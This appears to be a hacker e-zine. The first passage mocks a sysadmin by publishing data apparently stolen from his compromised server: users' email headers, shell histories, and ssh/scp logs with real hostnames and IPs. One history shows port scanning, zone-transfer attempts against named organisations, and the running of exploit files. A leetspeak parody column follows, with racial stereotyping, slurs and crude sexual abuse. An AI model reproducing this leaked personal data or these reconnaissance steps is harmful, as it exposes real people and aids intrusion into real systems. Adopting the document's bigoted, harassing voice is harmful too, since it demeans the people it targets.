Majordomo@FreeBSD.ORG bright:Reply-To: jgrosch@mooseriver.com bright:To: "Alfred Perlstein" bright:To: "Nick Stee." bright:To: bright:To: Alfred Perlstein bright:To: Bill Fumerola bright:To: Jonathan Lemon Alfred Perlstein bright:To: Josef Grosch bright:To: Nick S. bright:To: Tor.Egge@fast.no bright:To: alfred@productionbsd.com bright:To: alfred@wintelcom.net bright:To: alfred@wintelcom.net (Alfred Perlstein) bright:To: announce@bafug.org bright:To: bright@sneakerz.org cr:Delivered-To: cr@sneakerz.org cr:Delivered-To: dial.pipex.com-moduspublicity@dial.pipex.com cr:Delivered-To: mailing list distinctiverecords@listbot.com cr:Disposition-Notification-To: "RetrO" cr:Reply-To: cr:Reply-To: cr:Reply-To: confirm-sub-U-EmGb9P23-UBpOrf15CIYImMZ8@yahoogroups.com cr:Reply-To: confirm-sub-UBu_9nyHo3zeNMDbohWPyl-AC60@yahoogroups.com cr:Reply-To: freestyle@breakbeat.com cr:Reply-To: gay@breakbeat.com cr:Reply-To: root@sneakerz.org cr:To: "'cr@sneakerz.org'" cr:To: "CafePress.com Member" cr:To: "Zarul" , cr:To: "cr" cr:To: cr:To: cr:To: cr:To: cr:To: List Member cr:To: List Owner cr:To: ListBot Member cr:To: Rob Davis ; Rob Hives ; Rob Mac ; Rob Wood ; Toby Martin (E-mail) ; = cr:To: Scott Douglas cr:To: Trevor Wyatt ; Trevor Nelson ; trax ; Tracie storey ; tee bone ; = cr:To: cr@sneakerz.org cr:To: cr@sneakerz.org cr:To: jody.melbourne@itacsecurity.com cr:To: pm@sneakerz.org cr:To: r0n/ Patch / Buddha Man / PLS cr:To: rpm@airmail.net cr:To: undisclosed-recipients:; cr:To: www.inbox.net@airmail.net cr:X-Envelope-To: moduspublicity@dial.pipex.com desl:Delivered-To: desl@sneakerz.org desl:To: Dan Lennon desl:To: desl@sneakerz.org g:Delivered-To: g@sneakerz.org g:Reply-To: "eBay Marketing" g:Reply-To: "eBay" g:Reply-To: Sales@MDaemon.com g:Reply-To: eBay's Scoot Pursuit g:Reply-To: update@update.deerfield.com g:To: g:To: "Glen Messenger (E-mail)" g:To: "Morrison, Garth" , g:To: g@sneakerz.org g:To: valued_customer@deerfield.com g:X-MDaemon-Deliver-To: g@sneakerz.org james:>Delivered-To: josh@strangled.net james:>To: Joshua Anderson james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Apparently-To: james:Delivered-To: james:Delivered-To: james@sneakerz.org james:Delivered-To: james@strobe.org james:Errors-To: online1@wellsfargo.m0.net knowfx:>To: ms Essive knowfx:Delivered-To: dskz-outgoing@informationwave.net knowfx:Delivered-To: dskz@informationwave.net knowfx:Delivered-To: knowfx@sneakerz.org knowfx:Delivered-To: mailing list isn@securityfocus.com knowfx:Delivered-To: mailing list staff@staff.neethosting.com knowfx:Delivered-To: moderator for isn@securityfocus.com knowfx:Errors-To: admins-errors@java.blackened.com knowfx:In-Reply-To: <2004@ravine.binary.net> from "redmare" at Mar 23, 2001 01:02:39 PM knowfx:In-Reply-To: <2033@java.blackened.com>; from rockwood@concentric.net knowfx:In-Reply-To: <2087913@java.blackened.com>; from rockwood@concentric.net knowfx:In-Reply-To: <200@java.blackened.com> "from Jill Luster knowfx:In-Reply-To: from Scott knowfx:Reply-To: dskz@informationwave.net soupnazi:Reply-To: "Anissa" soupnazi:Reply-To: "Nuno Fernandes" soupnazi:Reply-To: soupnazi:Reply-To: soupnazi:Reply-To: Nightlife-feedback-25@lb.bcentral.com soupnazi:Reply-To: jeff@altaassociates.com soupnazi:Reply-To: orders@crutchfield.com suid:Delivered-To: BUGTRAQ@securityfocus.com suid:Delivered-To: bugtraq@lists.securityfocus.com suid:Delivered-To: bugtraq@securityfocus.com suid:Delivered-To: suid@sneakerz.org suid:In-Reply-To: suid:Reply-To: root@sneakerz.org suid:Reply-To: suid@SNEAKERZ.ORG suid:To: suid:To: (Recipient list suppressed) suid:To: suid:To: BUGTRAQ@SECURITYFOCUS.COM suid:To: Kris Hunt suid:To: Suid suid:To: suid@SNEAKERZ.ORG suid:To: suid@sneakerz.org suid:X-To: h@CKZ.ORG yowie:Delivered-To: yowie@sneakerz.org yowie:To: Yowie haha, ok check this out oh by the way, I HAVE NEVER BEEN OWNED, AND ALL YOU FUCKERS WHO SAY + YOU OWN ME, YOU DONT OWN SHIT YOU ARE JUST A BUNCH OF COWARDS AND + SCRIPT KIDDIES WHO DONT KNOW JACK SHIT ABOUT ANYTHING. # cd /root # cat .bash_history|less ls more doimport cd src ls make pwd ls -la cd .. lso ls sh doimport top top w ps -aux | grep zmagic ps -auwwx | grep zmagic w netstat 1 top w ps -aux | grep zmagic watch -W p7 w top top w ps -aux | grep irc kill -9 9989 ps -aux | grep zmagic w w top top w top w ls top ls ls -la top cd /home/users/zmagic/ ls ls- la ls -la top top last zmagic top ls top cd /home/users/par ls ls -al cd .. cd /home/users/rat ls -al head haha less -R IrcLog cd /home/staff/ps ls -al less .bash_history ps -aux | grep soupnazi watch -W p9 cd /usr/src ls cd /usr/src ls ls -la cd /shit/FreeBSD4/ ls more doimport cd /shit/FreeBSD4/ ls cd cvs/ ls ls -la cd src ls ls -la cd /shit/FreeBSD4/ ls cd svc cd cvs ls cd src/ ls ls -la make buildworld ls ls cvs cvs import cd /usr/src cvs import cvs update ls pwd ls ls-la ls -l cd sys ls ls -l date cd .. ls pwd cd sys ls locate newvers.sh cd /usr/src/sys/conf/ ls df cu -l cuaa0 cd /eyc cd /etc ls cd namedb/ ls cd cd /usr/ports/ ls cd net/ whereis named whereis bind ls cd .. ls cd sysutils/ ls cd .. ls whereis bind whereis bind8 cd net/ ls cd bind8/ make install all cd /etc ls cd namedb/ ls ci named.conf vi named.conf who w write josh who vvcc c who w ps -ax cd /etc ls who w vi named.conf vi named.conf vi named.conf ls sh make-localhost ls vi localhost.rev ls rm localhost.rev ls vi named.conf vi db.127.0.0 vi db.127.0.0 ls pwd w ls vi named.conf vi db.207.154.226 ls vi db.sneakerz ls who cd /etc/namedb/ ls cd /var/log ls tail messages vi /etc/rc.conf ifconfig -a grep named /etc/defaults/rc.conf vi /etc/rc.conf ls vi /etc/rc.conf ls cd ls cd /home/dave l;s cd /home ls cd /home/dave l;s cd /home ls cd staff/ ls cd ps ls cd .. cd josh/ ls cd .. cd dave ls ls -al cd vi /etc/group ls ndc start whereis ndc tail messages ssh -p220 dave@t1.google.com who cd /usr/ports/ ls cd irc ls cd epic4/ ls make install all ls cd cd /usr/ports/ ls cd irc ls who write root ssh -p220 dave@t1.google.com who telnet 0 21 who ps -ax ssh -p220 dave@t1.google.com epic w su - dave write root w vi /etc/inetd.conf cd su - dave killall -HUP inetd su - dave write root write root su - dave cd /usr/ports/www/ ls cd w3m su - monk su - dave cd /home/staff/ ls -l josh/ ls -l ps/ cd su - dave write ps w cd /home/nm cd /home/ncvs/ ls screen vi setuid.today grep rc.local /etc/* vi /etc/rc.local vi /etc/virtualip sh /etc/rc.local ifconfig -a w w df w w dmesg grep smurf /usr/ports/INDEX cd /usr/ports/security/smurflog/ ls make w dmesg top w ifconfig -a tcpdump find /sbin -perm 4000 find /sbin -perm -1000 ps ax ls -l /sbin df less /var/log/setuid.today grep root /var/log/messages top last jimjones w hostname we e w ps -ax cd /home ls cd staff/ ls cd /usr/local/apache/htdocs/ ls more index.html cd /shit/FreeBSD4/ cvsup -L 2 supfile export HOME=/root ls pwd ls -la more /home/staff/ps/.bash_history top more /home/staff/ps/.bash_history ht mutt thats history in the making Looking at your history files makes me want to read SECURING LINUX + IN 21 DAYS, all over again. Caviar dreams pm, caviar dreams. yah hehe did you see me ssh into google.com? wish you had my password huh? :) :D ok i got so much stuff for your wonderful tv show # cd / # cat sshstuff1 | less home/users/billf/.bash_history:ls -l .ssh/authorized_keys home/users/billf/.bash_history:ls .ssh/ home/users/billf/.bash_history:mkdir .ssh home/users/billf/.bash_history:vi .ssh/authorized_keys home/users/billf/.bash_history:vi .ssh/authorized_keys home/users/cr/.bash_history:ssh -lcr el8.net home/users/cr/.bash_history:ssh -lcr meth.lab.org home/users/cr/.bash_history:ssh -lrogue puck.nether.net home/users/cr/.bash_history:ssh -ls33r freenet.nether.net home/users/james/.bash_history:ssh 209.63.220.137 home/users/james/.bash_history:ssh 64.38.245.135 home/users/james/.bash_history:ssh 64.38.247.160 home/users/james/.bash_history:ssh 64.38.247.180 home/users/james/.bash_history:ssh afraid.org home/users/james/.bash_history:ssh cb2.kglimited.net home/users/james/.bash_history:ssh ns1.kglimited.net home/users/mux/.bash_history:mkdir .ssh home/users/mux/.bash_history:scp mux.dyn.dhs.org:.ssh/id_dsa.pub .ssh/authorized_keys2 home/users/scott/.bash_history:ssh -l skl pav-l1.hotmail.com home/users/scott/.bash_history:ssh mu.org home/users/suid/.bash_history:cd .ssh home/users/suid/.bash_history:ssh -l suid CPE-61-9-178-2.vic.bigpond.net.au home/users/walt/.bash_history:ssh 216.32.183.201 home/users/walt/.bash_history:ssh -p 216.32.183.201 home/users/walt/.bash_history:ssh 216.32.183.201 home/users/walt/.bash_history:ssh 216.32.183.201 -P home/users/walt/.bash_history:ssh aaronsca@mu.org home/users/walt/.bash_history:ssh pav-l1.hotmail.com # cat scpstuff1 | less home/users/mux/.bash_history:scp mux.dyn.dhs.org:.ssh/id_dsa.pub .ssh/authorized_keys2 home/users/oobe/.bash_history:scp -v bzImage 64.208.38.1:. home/users/oobe/.bash_history:scp -v bzImage root@64.208.38.2:. home/users/oobe/.bash_history:scp bzImage root@64.208.38.2:. home/users/oobe/.bash_history:scp bzimage root@64.208.38.2:. home/users/scott/.bash_history:scp evanw16.Imagine.IL.US.NeverNET.Net 62.252.9.43:~/ home/users/yowie/.bash_history:scp xf0rce.zip yowie@61.12.36,180:. home/users/yowie/.bash_history:scp xf0rce.zip yowie@61.12.36.180:. Ok pm, I am so so so so so sorry to interrupt you, but can + you please show me cr's history file? that, i can do UNIX BOWLERS! # cd /home/users/cr # less .bash_history ls -l /dev/null ls -la .bash_history rm .bash_history grep HIST .* set vi .profile screen -r mutt screen -r screen -r telnet mail.itacsecurity.com 110 telnet mail.itacsecurity.com 110 telnet mail.itacsecurity.com 110 mail telnet mail.itacsecurity.com 25 screen -r screen -r host -l workcover.com telnet www.sb.workcover.com 80 telnet www.sb.workcover.com 443 telnet www.sb.workcover.com 21 ftp www.sb.workcover.com more passwd rm passwd telnet www.sb.workcover.com 23 telnet www.sb.workcover.com 22 telnet www.sb.workcover.com 25 telnet www.sb.workcover.com 110 telnet www.sb.workcover.com 513 telnet www.sb.workcover.com 79 telnet www.sb.workcover.com 111 host -l workcover.com telnet 150.101.73.34 v21 telnet 150.101.73.34 21 telnet 150.101.73.34 22 telnet 150.101.73.34 telnet 150.101.73.35 80 telnet 80 telnet 192.231.203.33 80 telnet 192.231.203.33 21 telnet 192.231.203.33 111 telnet 192.231.203.33 110 telnet 192.231.203.33 22 telnet 192.231.203.33 25 telnet 192.231.203.33 79 whisker.pl host -l workcover.com.au host -l workcover.com telnet www.workcover.com 80 telnet www.internal.workcover.com 80 telnet internal.workcover.com 80 telnet www.school.workcover.com 80 telnet www.users.on.net 110 telnet www.users.on.net 21 nmap 150.101.73.34 exit ls -l screen -r slookup right.behind.you nslookup right.behind.you screen -r script work ls -l work gzip work chmod a-r work.gz ls -l screen -r nslookup www.e-safety.sa.gov.au host -l e-safety.sa.gov.au host -l sa.gov.au mutt screen -r screen -r exit mutt exit host -l workcover.com host -l internal.workcover.com z0ne nslookup 150.101.73.100 nslookup 150.101.73.101 nslookup 150.101.73.1 nslookup 150.101.73.2 nslookup 150.101.73.34 nslookup 150.101.73.35 nslookup 150.101.72.1 nslookup 150.101.72.2 screen -r exit mutt screen -r mutt screen -r bx cr_ irc.idle.net screen -r more wu261.c more wu261.c more wu2.6.1.c more rh7linuxconf.pl.txt mutt screen -r screen -r mutt screen 0r screen -r mutt exit mutt screen -r screen -r slookup itac1.lnk.asionline.net nslookup itac1.lnk.asiaonline.net nslookup itac1.lnk.cbr.asiaonline.net host -l lnk.asiaonline.net host -l lnk.cbr.asiaonline.net host -l cbr.asiaonline.net nslookup itac1.sbr.asiaonline.net nslookup itac1.cbr.asiaonline.net screen -r mutt screen -r screen -r mutt exit ls exit ls cp admtac0s-bin.gz www lynx sneakerz.org/~cr ls ls -la screen -r screen -r screen -r *.c ls *.c screen -r more wu2.6.1.c screen -r grep site wu*.c screen -r more wu261.c screen -r more wu261.c screen -r screen -r ls screen -r ls more linuxconf.c ssh -ls33r freenet.nether.net telnet freenet.nether.net telnet freenet.nether.net 21 telnet puck.nether.net 22 ssh -lrogue puck.nether.net screen -r ar zxvf linuxconf-xpl.tar.gz tar zxvf linuxconf-xpl.tar.gz more linuxconf-xpl. more linuxconf-xpl.c screen -r s ls screen -r screen -r ssh -lcr el8.net screen -r exit screen -r exit screen -r exit set export TERM=vt100 screen -r cd www ;s ls mail guy@breakbeat.com screen -r telnet 150.101.73.100 80 telnet 150.101.73.100 80 telnet 150.101.73.100 80 screen -r ls ls *.c screen -r screen -r ls ls *.c screen -r mutt exit mutt screen -r export IRCNAME="flip the track, bring the oldschool back" bx cr irc.mcs.net screen -S ef bx cr irc.mcs.net telnet 150.101.73.100 80 telnet 150.101.73.100 80 screen -r screen -r exit screen -r lynx www.apache.org lynx www.slashdot.org lynx www.slashdot.org lynx www.slashdot.org lynx www.slashdot.org screen -r exit screen -r mutt tar zxvf work.gz tar zxvf route_finder.tar.gz cd rf ls -l more route_finder more word_route_finder screen -r ls more route_finder ls more word_route_finder ls cd .. ls exit mutt screen -r ls cd rf ls more words rm words ls ls -la cd .. ls *.tar.gz screen -r exit mutt screen -r w screen -r ls -la more linuxconf-xpl.c screen -r ls exit screen -r mutt screen -r telnet 150.101.73.100 80 screen -r exit mutt screen -r host -l workcover.com dig @workcover.com any any telnet 150.101.73.100 80 telnet 150.101.73.100 53 sscreen -r traceroute traceroute 150.101.73.34 screen -r bx cr irc.oz.org screen -r nslookup 203.53.186.41 nslookup 203.53.186.1 mutt screen -r telnet www.afp.gov.au 80 head 3.c screen -r mail buo@ussrback.com date screen -r ls cat 3.c |mail buo@ussrback.com screen -r mutt screen -r clear cd .hi cd rf ls more route_finder ls more word_route_finder q ls screen -r ls more 1.c more 1.c ls more 3.c ls ls *.c more fbsd2.c more fbsd.c more fbsd.c gcc fbsd.c -o fbsd ./fbsd ./fbsd 0 screen -r more fbsd.c qtail fbsd.c tail fbsd.c screen -r ssh -lcr meth.lab.org screen -r ssh -lcr el8.net screen -r nmap ls more crpron cd .. screen -r telnet www.horseland.com 80 telnet www.horseland.com 443 screen -r screen -r mutt screen -r screen -r vi cat pro |cut -f2 -d" " cat pro |cut -f2 -d" ">> pro2 more pro2 rm pro* screen -r screen -r bx cr irc.dal.net bx cr irc.austnet.org bx cr irc.undernet.org screen -r exit screen -r nc find / -name nc -print 2>/dev/null screen -r screen -r mutt screen -d -r box to even get questioned by the feds in .au though mutt exit hahahaha pm, I can't stop but ask, why was cr doing nslookup on + right.behind.you? LOL im laughing my ass off it also looks like he tried to own my system with that fbsd.c shit i should kick all these users off and add more elite ones, more + w00w00 people. # cd / # cat bitchxstuff1 | less -rw-r----- 1 cr users 832281 home/users/cr/.BitchX/BitchX.away -rwx------ 1 g users 29427 home/users/g/.BitchX/BitchX.away* -rw-r----- 1 mux users 38061 home/users/mux/.BitchX/BitchX.away -rw-r----- 1 suid users 270331 home/users/suid/.BitchX/BitchX.away -rw------- 1 udp users 5229 home/users/udp/.BitchX/BitchX.away -rw-r----- 1 zmagic users 4312 home/users/zmagic/.BitchX/BitchX.away cr's away file is huge :D i will show it to you later during our private session i would also like to reiterate that I HAVE NEVER BEEN OWNED. ONE DAY + THE POWER SUPPLY BLEW UP BECAUSE A TERMITE ATE THE WOOD CASING. MY + SYSTEM IS NOT DOWN BECAUSE IT WAS HACKED, IT HAS NEVER BEEN HACKED, AND + NONE OF YOU CAN HACK IT. IF ANYONE CAN HACK IT, SHIT, I WILL GIVE THEM + A BLOWJOB COURTESY OF SNEAKERZ (TM) NETWORKS. r0b1n, people on my system ssh (not telnet) to some of the most + incredible and secure systems in the universe, take a look see # cd / # cat sshstuff2 | less home/staff/monk/.ssh/known_hosts:funksion.org home/staff/monk/.ssh/known_hosts:9mm.com home/users/awnex/.ssh/known_hosts:shadowside.org home/users/billf/.ssh/known_hosts:elvis.mu.org home/users/billf/.ssh/known_hosts:hate.chc-chimes.com home/users/bright/.ssh/known_hosts:hardcode.wintelcom.net home/users/cr/.ssh/known_hosts:ns6.siteleader.net home/users/cr/.ssh/known_hosts:meth.lab.org home/users/cr/.ssh/known_hosts:61.12.32.120 home/users/cr/.ssh/known_hosts:titus.visual.com home/users/cr/.ssh/known_hosts:www.breakbeat.com home/users/cr/.ssh/known_hosts:breakbeat.com home/users/cr/.ssh/known_hosts:wstrn.com home/users/cr/.ssh/known_hosts:puck.nether.net home/users/cr/.ssh/known_hosts:el8.net home/users/g/.ssh/known_hosts:198.142.183.24 home/users/g/.ssh/known_hosts:yowie.kg home/users/g/.ssh/known_hosts:198.142.196.172 home/users/g/.ssh/known_hosts:203.28.37.130 home/users/g/.ssh/known_hosts:breakbeat.web.us.uu.net home/users/james/.ssh/known_hosts:atlantis.tranquility.net home/users/james/.ssh/known_hosts:0 home/users/james/.ssh/known_hosts:shell1.tranquility.net home/users/james/.ssh/known_hosts:blacklight.strobe.org home/users/james/.ssh/known_hosts:bl.strobe.org home/users/james/.ssh/known_hosts:206.152.119.225 home/users/james/.ssh/known_hosts:tranq3.tranquility.net home/users/james/.ssh/known_hosts:afraid.org home/users/james/.ssh/known_hosts:stats.paycounter.com home/users/james/.ssh/known_hosts:63.195.184.43 home/users/james/.ssh/known_hosts:63.195.184.247 home/users/james/.ssh/known_hosts:63.195.184.126 home/users/james/.ssh/known_hosts:ns1.wintelcom.net home/users/james/.ssh/known_hosts:tranq1.tranquility.net home/users/james/.ssh/known_hosts:jobe.strobe.org home/users/james/.ssh/known_hosts:strobe.org home/users/james/.ssh/known_hosts:64.166.225.94 home/users/james/.ssh/known_hosts:mir.base16.org home/users/james/.ssh/known_hosts:home.afraid.org home/users/james/.ssh/known_hosts:cb1.wintelcom.net home/users/james/.ssh/known_hosts:12.153.162.137 home/users/james/.ssh/known_hosts:64.38.247.160 home/users/james/.ssh/known_hosts:64.38.247.180 home/users/james/.ssh/known_hosts:cb2.kglimited.net home/users/james/.ssh/known_hosts2:afraid.org home/users/james/.ssh/known_hosts2:c191933-b.clmba1.mo.home.com home/users/james/.ssh/known_hosts2:home.strobe.org home/users/knowfx/.ssh/known_hosts:132.170.44.44 home/users/james/.ssh/known_hosts2:home.strobe.org home/users/knowfx/.ssh/known_hosts:132.170.44.44 home/users/knowfx/.ssh/known_hosts:neethosting.com home/users/mux/.ssh/known_hosts2:mux.dyn.dhs.org home/users/oobe/.ssh/known_hosts:64.208.38.2 home/users/par/.ssh/known_hosts:65.5.27.115 home/users/par/.ssh/known_hosts:65.5.27.252 home/users/rat/.ssh/known_hosts:port44.dorms44.ucf.edu home/users/reject/.ssh/known_hosts2:zap.netfrag.com home/users/scott/.ssh/known_hosts:mu.org home/users/scott/.ssh/known_hosts:62.252.9.43 home/users/scott/.ssh/known_hosts:pav-l1.hotmail.com home/users/soupnazi/.ssh/known_hosts:216.240.185.234 home/users/soupnazi/.ssh/known_hosts:209.191.170.8 home/users/soupnazi/.ssh/known_hosts:noodle-soup.fortunecity.com home/users/soupnazi/.ssh/known_hosts:postal1.fortunecity.com home/users/soupnazi/.ssh/known_hosts:lower.org home/users/soupnazi/.ssh/known_hosts:132.170.44.44 home/users/soupnazi/.ssh/known_hosts:jimjones.niggacrazy.com home/users/soupnazi/.ssh/known_hosts:legion2000.net home/users/soupnazi/.ssh/known_hosts:shell.openhack.com home/users/soupnazi/.ssh/known_hosts:ws1.nhl.com home/users/soupnazi/.ssh/known_hosts:www.djalterego.com home/users/soupnazi/.ssh/known_hosts:ws4temp.nhl.com home/users/soupnazi/.ssh/known_hosts2:209.191.170.220 home/users/spider/.ssh/known_hosts:64.172.12.3 home/users/suid/.ssh/known_hosts:kernel.net home/users/suid/.ssh/known_hosts:jawa.chilli.net.au home/users/suid/.ssh/known_hosts:yowie.kg home/users/suid/.ssh/known_hosts:61.12.32.120 home/users/suid/.ssh/known_hosts:ninjastrike.com home/users/suid/.ssh/known_hosts:cpe-61-9-146-112.vic.bigpond.net.au home/users/suid/.ssh/known_hosts:61.9.146.112 home/users/udp/.ssh/known_hosts:port44.dorms44.ucf.edu home/users/udp/.ssh/known_hosts:coalesce.underworld.net home/users/udp/.ssh/known_hosts:boredom.org home/users/udp/.ssh/known_hosts:voodooland.net home/users/udp/.ssh/known_hosts:leviathan.org home/users/udp/.ssh/known_hosts:fire.efnet.org home/users/walt/.ssh/known_hosts:pav-l1.hotmail.com home/users/walt/.ssh/known_hosts:mu.org home/users/yowie/.ssh/known_hosts:61.12.36.180 home/users/zmagic/.ssh/known_hosts:tdz.dhs.org home/users/zmagic/.ssh/known_hosts:zsh.interniq.org home/users/zmagic/.ssh/known_hosts:132.170.44.12 home/users/zmagic/.ssh/known_hosts:fire.efnet.org home/users/zmagic/.ssh/known_hosts:216.30.134.185 home/users/zmagic/.ssh/known_hosts:users.interniq.org home/users/zmagic/.ssh/known_hosts:syn.ackers.net home/users/zmagic/.ssh/known_hosts:stardust.europeonline.net home/users/zmagic/.ssh/known_hosts:phear.org home/users/zmagic/.ssh/known_hosts2:rain.ktwo.ca home/users/zmagic/.ssh/known_hosts2:frost.ktwo.ca hehe *** r0b1nleech is now known as WOW *** *** WOW is now known as r0b1nleech *** hahahahaha Wow man, hotmail, efnet, ktwo! You are probably the best guest I have ever owned, oops, I mean + interviewed for lyfestylez of the owned and lamest. thanks r0biepoos PART THREE: remind them about the never been owned stuff Caviar dreams. We have just had a guest who personifies the + hacker life style. He hacks, He codes, He works for google, He's worked + for microsoft, He's been around. And one thing I would like to point out + about our guest, is that he has never been owned, and never will be. yup, never been owned See, owning someone this incredibly lame takes an enourmous + amount of skill, which of course, no one has. In a fantasy world, where hacking is life, pm, one of the + greatest lamers around, lives the dream, lives the big life, drives + a bmw, and hangs out in #!w00w00. What more can you ask for? I leave + you with this final note: pm, has NEVER, EVER, EVER, EVER, I repeat NEVER EVER EVER + EVER EVER NEVER EVER EVER EVER EVER, been owned. good night, suck my fat dick, and wipe that dangling shit + off the tip of your dick stick. yah bye, btw NEVER BEEN OWNED hah, cya .~e~----------------------------------------------------------~e~. ; *05* muz1k in the undergr0und -- uncle m4v1s ; `----------------------------------------------------------------' muz1k 1n the undergr0und by uncle m4v1s --------------- the p4zt few ye4rz have s33n a surge 0f muz1kal tal3ntz 1n the d1g1t4l undergr0und.... fr0m the 4sh3z 0f g4ngst4h r4p c0mez a new g3nr3 0f muz1k 2 rev0lut10n1z3 the w0rld 4ever... e-thug d1g1t4l r4p. uncle m4v1s h4z k0mp1l3d a l1zt 0f 2dayz *h0ttezt* art1ztz 1n th3 haqr subkultur3 & s0me rev1ewz... the ph4t be4tz and krayzEeE b4ssl1nez u he4r 1n kutt1ng edg3 e-thug d1g1t4l r4p w3r3 pi0neered by n0ne 0ther than the m4ster bl4zt3r h1mself, h4g1z' sh0ckwave r1d3r. sp0rt1ng h1z d33p-runn1n m1ztruzt 0f auth0rity 4nd h1z 1ntim8 kn0wledge 0f g4ng w4rf4re, the acqu1z1ti0n 0f 1llegal drugz & weap0nz, & the cl0zely gu4rd3d s3kr3t 0f h0w 2 h1t th3 g-sp0t in 0ver 38 unique w4yz, he sh0qd th3 w0rld by pl4c1ng sh4dy & kl3v3rly w0rd3d c4tch phr4sez 1n h1z IRCNAME variable. h3 br0ught h0n0r 2 h1z ment0rz eazy-e and chuck-d by pr0v1d1ng 1nexper13nz3d wh1te k1dz on 1rc w1th 4 d4nger0us and 4st0und1ng 1ns1ght 1n-2 wh4t 1t m34nz 2 b3 black, r3f3r3nc1ng such 1rc n4m3z az "1t t4k3z 4 n4t10n 0f m1ll1i0nz 2 h0ld my saq" [see publ1k 3n3my, 54]. 0ften th3z3 0bskure l1n3z w0uld s3nd phell0w f@ wh1t3 h4qrz dr3ss3d in BDUz & k0mbat b00tz runn1ng 2 g00gl3. wh3n mb'z st4tuz az an undergr0und br0th4 wuz f1nal1zed [see "blaq 1z merely 4 st4t3 0f m1nd", 82] 0therz were s00n 2 f0ll0w. so1o 0f ph4med t33n haqr/he4rtThr0bz c0deZerO k0mb1n3d h1z sk1ll3d kn0wledg3 0f purch4z1ng n1qlb4gz & begg1ng 4 k04dz wh3n h3 c0ined th3 3ver s0-p0pular k4tch phr4ze "y() d4wg, 5up." & the r3zt u kn0w 1z h1zt0ry. u k4n r34d m0re inph0 ab0ut s1 in m1ke sch1ffman'z upk0m1ng b00k ent1tl3d "br0, 1m a h4qr n0t a k0d3r" (ISBN 835827577158). th0 d1g1t4l thugz in tha 2K+2 may !have (th4tz a l0g1k4l neg4t10n, or "n0t have" 4 u untekn1k4l read3rz) even h34rd 0f nw4, they st1ll r3pruhz3nt the s4me c0ld he4rt-0f- d4rkn3zz / str8 phr0m s0uth c3ntr4l m3nt4l1ty th@ fu3l3d f34tz 0f m4str haqry 1n the m1d 90z, such 4z the t4ktik4l l0gic-b0mb 1mpl4nt3d 1n-2 yah00. s0me k0mpl41n th@ the 1rc thugz 0f the new m1ll3nn1um h4ve l0st ph0kuz 0f kreat1ng hypn0t1z1ng phreakyPhr3$h phl0w & r 2 kaught up 1n s3ll1ng drugz 0n 3fn3t 0r putt1ng up p1cz 0f the1r n3w r1mz 0n th31r h3rt.0rg h0mepagez, but u k4n dec1de 4 y0urself. ytcracker [the 0r1g1n4l d1g1t4l g4ng3r] --------------------------------------- th3 f1rzt 2 expl1c1tly use the t3rm '0r1g1n4l d1g1t4l g4ngst4h' when h3 gr4ff3d h1z mug 0n th3 dcaa website 11/23/99. the e-g1f p1ktur3, l00s3ly b4s3d 0n 4 ph0t0 t4k3n dur1ng th3 #sesame str33t 1rc sh0wd0wn sh0wz a rugg1sh thugg1sh y0ung yT, dr3zz3d 4 b1t l1ke kR4zy t3d k4cz1nszky [s33 http://www.paybackprod.com/hackedsites/dcaa] w1th wh4t app34rz 2 be a huge g0ld ch41n k00l3ct3d phr0m 3 m0nthz 0f p4wn1ng m0sth8d's e-l00t. th0 2 many @ ph1rst gl4nc3 h3 appe4rz 2 be we4r1ng a pe4c3 symb0l, rum0rz circul8 th@ yT l00ted th1z r3l1c 4ft3r gunn1ng d0wn a f4m1ly 0f as14n sh0p0wn3rz 1n k0ld bl00d in the inf4m0uz LA ri0tz. st1ll 0therz s4y 1t 1z n0t a p34c3 symb0l @-all, but r34lly a h00d 0rnament st0len phr0m shuge kn1ghtz benz!! whut3v3r the true st0ry 1z, ytcraqr h4z k0nt1nu3d 2 1nsp1r3 y0ung e-thugz w0rldw1d3. 1t 1z rep0rt3d th@ ytkrakr mp3z r h3r4d 4z f4r away az k4r4ch1, wh3r3 h1z pr0tegez gf0rce p4k1st4n h4v3 sh0qd l0c4l m0squez by bl4stn d1g1t4l h1ph0p 0uts1d3. 1n p4k1st4n, wh3r3 l1n0leum phl00rz r unava1lable, 0ne gf0rce member, german_gu c4us3d qu1te a st1r by bec0ming the ph1rzt musl1m bb0y 2 buzt 0ut 1n2 a w1ndm1ll 0n hiz pr4y3r m4t. unphortun4tely, m0zt 0f yTcr4ck3rz w0rk 1z unr3l34z3d, & un4v4il4ble 4 d0wnl0ad. but 2 m4ny, th1z d0eznt m4tt3r, 4 th0ze wh0 v1e3 h1m 4z an 1k0n 0f s1n & rebell10n. yt iz str8 up p10n33r. r00tabega --------- 4z they r kall3d 0n their page, "r00tabega: 1ndepend3nt hyde p4rk h1p h0p." damn h0w d0 i descr1be th1z except az 'pr0l1f1k.' bansh33 p0pz 0ut new rele4s3z ph4ster th4n 0l d1rty bast4rd k4n get b1tchez pregn4nt. u k4n ch3ck 0ut th3z3 b34tz @ http://www.r00tabega.org/rap th31r l8zt release 1z kalled 'the c0c00n' & m4n 1tz exxxxxxxxxXtra phantast1kly phre$$$$$$$$$h. r00tabegz phearl3zz leader 1z r1shi bh4t, u m1ght r3m3mb3r h1m az th3 ugly l1tl krumbsn4tchr phr0m th3 ph1lm 'th3 1nd14n 1n the cupb04rd.' u kan ch3ck h1z interv1ew @ http://www.rediff.com/chat/trans/0216rish.htm 4z we k4n c y0ung r1sh1 1z a k0l0rful ch4r4ct3r; he st4rt3d haqng PRIMOS @ the age 0f 6, & wuz 1nsp1r3d 2 freestyle apht3r 0wn1ng h1z 1zt DMS100. wh4t d0ez r1sh1 d0 4 fun? w3ll the maztr h1mself repliez: "Programming, Tennis, Piano, Clarinet, Rapping." r00tabega, wh1ch ink0rp0r8z inkredible muzik4l/haqng t4l3ntz such as the 1ncred1bl3 "busdr1v3r" (hehe he g0t th1z n4m3 k0z he takez u all 2 sk00l!) and bansh33, r seen by m4ny 4z a resp0nse 2 the 1nf4m0uz "ICY HOT STUNTAHZ," an0th3r tr10 0f rap superstarZzzZ wh0 h4v3 b33n kn0wn 2 frequent the 3r1z PHR33 netw0rkz but d0 n0t h4ck. 2 bansh33 th1z 1z 4ll th3 d1ff3r3nc3. wh3n 4sk3d ab0ut h1z op1n10n 0f the 1cy h0t stunt4hz h3 pau4z3d 4 a m0ment, t0ld me 2 "h0ld up d4wg" and st4rt3d t4pp1ng h1z f00t (he 0nly wearz LuGZ), 4nd r4pp3d @ me: "y0 phuck 1cy h0t kuz theyre cheaterz... everyb0dy kn0wz cuz wez eleEeter.... 1f 1 ever s4w 